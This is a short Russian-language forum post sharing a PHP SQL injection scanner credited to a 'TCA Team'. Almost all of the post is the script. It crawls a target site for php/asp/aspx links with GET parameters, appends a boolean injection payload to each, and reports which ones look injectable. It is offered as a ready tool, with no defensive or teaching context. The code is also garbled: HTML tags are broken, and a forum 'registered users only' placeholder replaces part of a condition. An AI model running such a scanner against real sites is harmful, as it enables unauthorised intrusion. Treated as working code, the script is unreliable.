Турецкий код для поиска SQL уязвимости. Код: ?php #TCA Team #Sql injection scanner Coded By ./MekiTembem404 $http = ""; if($http == "") die("Http is empty! b>Powered by TCA/b> # TCA Team"); echo "Scan for : b>$http/b> "; $http = (substr($http, -1) != "/") ? $http."/" : $http; $found = getGet(); function getGet() { global $http; $getN = array(); $fenN = array(); $htm = @file_get_contents($http); @preg_match_all("/((/[a-zA-Z0-9]+/)|)([a-zA-Z0-9]+.[a-zA-Z0-9]+?)([a-zA-Z0-9]+)(s*=)([a-zA-Z0-9]+)/im", $htm, $gets); foreach($gets[0] as $get) { $get = str_replace($http, "", $get); if(!in_array($get, $getN)) { @preg_match_all("/(.*)(?)/", $get, $gn); $name = str_replace("?", "", $gn[1][0]); if(Ссылка доступна только зарегистрированным пользователям_array($name, $fenN) && @in_array(substr(strrchr($name, "."), 1), array("php", "asp", "aspx"))){ $getN[] = $get; $fenN[] = $name; } } } return $getN; } foreach($found as $get) { $address = $http.$get; $htm1 = @file_get_contents($address); $htm2 = @file_get_contents($address."%20and%20"a"%20=%20"a""); if($htm1 == $htm2) echo $get." b>font color="#1B9B1B">SQL injection!/font>/b> "; else echo $get." b>font color="#D80404">Failed!/font>/b> "; } echo " b>Powered by TCA/b> "; ?>
